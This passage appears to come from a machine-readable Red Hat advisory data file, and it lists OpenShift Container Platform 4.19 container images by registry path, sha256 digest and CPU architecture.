"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
